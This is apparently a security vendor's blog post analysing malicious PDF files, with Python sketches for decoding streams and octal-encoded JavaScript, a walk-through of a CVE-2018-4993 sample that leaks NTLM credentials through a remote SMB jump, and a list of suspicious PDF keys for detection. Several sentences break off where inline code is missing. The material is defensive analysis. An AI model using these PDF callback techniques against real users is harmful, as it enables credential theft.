Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague, in particular, email users. Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.
Regular readers of the S1 blog will be familiar with the idea of malicious Office attachments that run VBA code from Macros or use DDE to deliver attacks, but not so well-known is how PDFs can execute code.
In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just applications like Adobe Reader and Adobe Acrobat. Most browsers contain a built-in PDF reader engine that can also be targeted. In other cases, attackers might leverage AcroForms or XFA Forms, scripting technologies used in PDF creation that were intended to add useful, interactive features to a standard PDF document.
To get a better understanding of how such attacks work, let’s look at a typical PDF file structure. We can safely open a PDF file in a plain text editor to inspect its contents. At first glance, it might look indecipherable:
However, with a bit of knowledge of PDF file structure, we can start to see how to decode this without too much trouble. The body or contents of a PDF file are listed as numbered “objects”. These begin with the object’s index number, a generation number and the “obj” keyword, as we can see at lines 3 and 19, which show the start of the definitions for the first two objects in the file:
1 0 obj
2 0 obj
The end of each object is signalled with the keyword endobj, as seen at lines 18 and 24 for Object 1 and Object 2, respectively.
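The object layout described above can be explored with a few lines of Python. This is only a rough sketch: `list_objects` and the miniature `sample` file are hypothetical names made up for illustration, and a regex scan like this ignores the cross-reference table that a real PDF parser would use.

```python
import re

# Matches "<object number> <generation number> obj ... endobj".
# re.DOTALL lets "." span newlines; the lazy body stops at the first endobj.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj\b", re.DOTALL)

def list_objects(pdf_bytes):
    """Return (object_number, generation, body_bytes) for each object found."""
    return [
        (int(m.group(1)), int(m.group(2)), m.group(3).strip())
        for m in OBJ_RE.finditer(pdf_bytes)
    ]

# Hypothetical miniature file, just to exercise the function.
sample = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Length 5 >>\nstream\nhello\nendstream\nendobj\n"
    b"2 0 obj\n<< /JS 1 0 R >>\nendobj\n"
)

for number, generation, body in list_objects(sample):
    print(number, generation, body[:40])
```

Reading the file as bytes rather than text matters here, because stream contents are often binary and would not survive a text decode.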
Object 2 immediately offers us some clues. We can see that it contains a dictionary (signalled by the chevrons
JS 1 0 R
This tells us that the “garbage” code in Object 1 between the keywords stream (line 8) and
As we’ve pointed out before, one thing you need to get used to when doing this kind of work is tidying up code to make it easier to work on. Here’s the same code after running it through a beautifier or prettifier in Sublime Text:
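Before compressed code can be beautified, the stream has to be inflated. The following is a minimal sketch of that step, assuming the stream uses the common /FlateDecode (zlib) filter, which the text above does not name explicitly. `inflate_streams` and `sample` are hypothetical names, and locating streams by keyword is a shortcut; a proper parser would rely on the /Length entry instead.

```python
import re
import zlib

# Capture everything between the "stream" and "endstream" keywords.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)

def inflate_streams(pdf_bytes):
    """Return the inflated contents of every stream that is valid zlib data."""
    results = []
    for match in STREAM_RE.finditer(pdf_bytes):
        raw = match.group(1)
        try:
            # decompressobj tolerates the end-of-line bytes that trail the
            # compressed data before "endstream" (they land in unused_data).
            results.append(zlib.decompressobj().decompress(raw))
        except zlib.error:
            # Not zlib data (uncompressed, or a different filter): skip it.
            continue
    return results

# Hypothetical object with a Flate-compressed JavaScript payload.
payload = zlib.compress(b"app.alert(1);")
sample = (
    b"1 0 obj\n<< /Filter /FlateDecode /Length "
    + str(len(payload)).encode("ascii")
    + b" >>\nstream\n" + payload + b"\nendstream\nendobj\n"
)

for script in inflate_streams(sample):
    print(script.decode("latin-1"))
```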
Compressed streams aren’t the only way PDF files can contain obfuscated code. Here’s another file, one that looks more worrying when we check its hash on VirusTotal:
As the image from VT makes clear, this is some kind of trojan that’s exploiting CVE-2018-4993. Let’s open it up and take a look inside.
This is a very small file. There are only four objects, but the one that interests us is Object 3 and the value for the dictionary key /AA. Note that this contains a child dictionary with key name /O. That’s important because the /O key specifies actions that should occur when a document is opened. And the value of this key is itself another dictionary containing
Unlike our previous file, however, this one does not specify a filter. Luckily, the value of “JS” is clearly recognisable as octal encoding. Octal (or “oct”) uses three digits between 0 and 7 to specify a single value. The best thing about oct is we don’t need to roll up our Python sleeves to interpret it; we can just print it out directly on the command line:
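For readers who would rather script the decoding than use the shell, the same idea can be sketched in Python. The `encoded` value below is a made-up illustration, not the string from the sample file, and `decode_octal_escapes` is a hypothetical helper name.

```python
import re

# A backslash followed by one to three octal digits, as used in PDF strings.
OCTAL_ESCAPE = re.compile(rb"\\([0-7]{1,3})")

def decode_octal_escapes(data):
    """Replace each \\ddd octal escape with the single byte it encodes."""
    return OCTAL_ESCAPE.sub(
        # Mask to one byte so an oversized value such as \777 cannot overflow.
        lambda m: bytes([int(m.group(1), 8) & 0xFF]),
        data,
    )

# Illustrative input only: the octal escapes spell out a harmless script.
encoded = rb"\141\154\145\162\164\050\061\051"
print(decode_octal_escapes(encoded).decode("latin-1"))  # alert(1)
```

Each escape maps to exactly one byte, so the decoded script is always shorter than the encoded one, and any bytes that are not escaped pass through unchanged.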
Going back to the /AA dictionary in the PDF, note the two lines which specify
This code issues the “Go To Remote” action, telling the reader application to jump to the destination specified under the
We can use cURL to grab the headers from that IP address to see what we can learn.
Looks like we need some authentication to get past the server, and that’s exactly where the danger lies for Windows users. If the attacker has set up the remote file as an SMB share, then the crafted PDF’s attempt to jump to that location will cause an exchange between the user’s machine and the attacker’s server in which the user’s NTLM credentials are leaked.
This happens because when a user tries to access SMB shared files, Windows sends the user name and a hashed password to automatically try to log in. Although the hashed password is not the user’s actual password, the leaked credentials can be used to set up SMB relay attacks and, if the password is not particularly strong, automated password-cracking tools can easily recover the plain-text version from the hash.
Let’s see what VT makes of the IP address.
This host has a reputation as malicious, so there’s a good chance that this PDF file is, as suspected, trying to capture the user’s NTLM credentials.
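The markers seen in the two files so far lend themselves to a quick first-pass triage. The sketch below simply counts a handful of dictionary keys in the raw bytes. The key list is an assumption: /JS and /AA appear in the files above, /GoToR is the PDF name for the “Go To Remote” action, and /JavaScript, /OpenAction and /XFA are added here as other commonly checked names. `count_keys` and `sample` are hypothetical, and a hit is a prompt for closer inspection rather than proof of malice.

```python
import re

# Assumed list of keys worth a closer look; adjust to taste.
SUSPICIOUS_KEYS = (b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/GoToR", b"/XFA")

def count_keys(pdf_bytes, keys=SUSPICIOUS_KEYS):
    """Count occurrences of each key name in the raw file bytes."""
    counts = {}
    for key in keys:
        # The lookahead stops "/AA" from matching inside a longer name.
        pattern = re.compile(re.escape(key) + rb"(?![A-Za-z0-9])")
        counts[key.decode("ascii")] = len(pattern.findall(pdf_bytes))
    return counts

# Hypothetical object loosely modelled on the structure described above.
sample = b"3 0 obj\n<< /Type /Page /AA << /O << /S /GoToR /F (x) >> >> >>\nendobj\n"

for name, hits in count_keys(sample).items():
    print(name, hits)
```

A scan like this misses keys hidden inside compressed streams or written with hex-escaped name characters, so an empty result does not mean a file is clean.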
In January this year, another kind of callback flaw was spotted in XFA forms. XFA (also known as “Adobe LiveCycle”) was introduced by Adobe in PDF v1.5 and allows PDFs to dynamically resize fields within a document, among other things. Unfortunately, XFA also lends itself to misuse. As explained in this POC, a stream can contain an xml-stylesheet that can also be used to initiate a direct connection to a remote server or SMB share.
In this stream, the reader will parse the URL and immediately attempt a connection. Although there are no known cases of this method being used in the wild to date, the researcher tested it against Adobe Acrobat Reader DC, version 19.010.20069.
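One way to check a decoded XFA stream for this kind of callback is to pull out the target of any xml-stylesheet processing instruction and flag the ones that point off-machine. The following is a rough sketch under stated assumptions: `stylesheet_targets` and `looks_remote` are hypothetical helpers, the sample uses a documentation-only IP address, and the input is assumed to be an already decompressed stream.

```python
import re

# Capture the href value of each <?xml-stylesheet ... ?> processing instruction.
STYLESHEET_RE = re.compile(
    rb"<\?xml-stylesheet\b[^>]*?\bhref\s*=\s*([\"'])(.*?)\1",
    re.DOTALL | re.IGNORECASE,
)

def stylesheet_targets(stream_bytes):
    """Return every stylesheet href found in the stream, as text."""
    return [m.group(2).decode("latin-1") for m in STYLESHEET_RE.finditer(stream_bytes)]

def looks_remote(target):
    """True for http(s) URLs and UNC-style paths such as \\\\host\\share."""
    return target.lower().startswith(("http://", "https://", "\\\\", "//"))

# Hypothetical stream content; 198.51.100.7 is a reserved documentation address.
sample = (
    rb'<?xml version="1.0"?>'
    rb'<?xml-stylesheet type="text/xsl" href="\\198.51.100.7\share\x.xslt"?>'
    rb"<xdp:xdp></xdp:xdp>"
)

for target in stylesheet_targets(sample):
    print(target, "remote" if looks_remote(target) else "local")
```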
While these mitigations are “nice to have” and certainly worth considering, bear in mind that these features were added, just like MS Office Macros, to improve usability and productivity. Therefore, be sure that you’re not disabling some functionality that is an important part of your own or your organization’s workflow.
For enterprise situations, you should ensure you have a good EDR security solution that offers both full visibility into your network traffic, including encrypted communications, and comprehensive firewall control. Of course, these days, behavioral AI detection is a must-have to properly protect your network and assets from all attacks, including malicious PDFs. SentinelOne customers can, in addition, scan PDF documents before they are accessed with our Nexus Embedded SDK.
Leveraging malicious PDFs is a great tactic for threat actors as there’s no way for the user to be aware of what code the PDF runs as it opens. Both the file format and file readers have a long history of exposed and, later, patched flaws. Because of the useful, dynamic features included in the document format, it’s reasonable to assume further flaws will be exposed and exploited by adversaries. With the ever-increasing tide of phishing and social engineering tactics targeting users, it’s vital that you remain vigilant about the dangers of PDFs and deploy a Next Gen security solution to prevent attacks.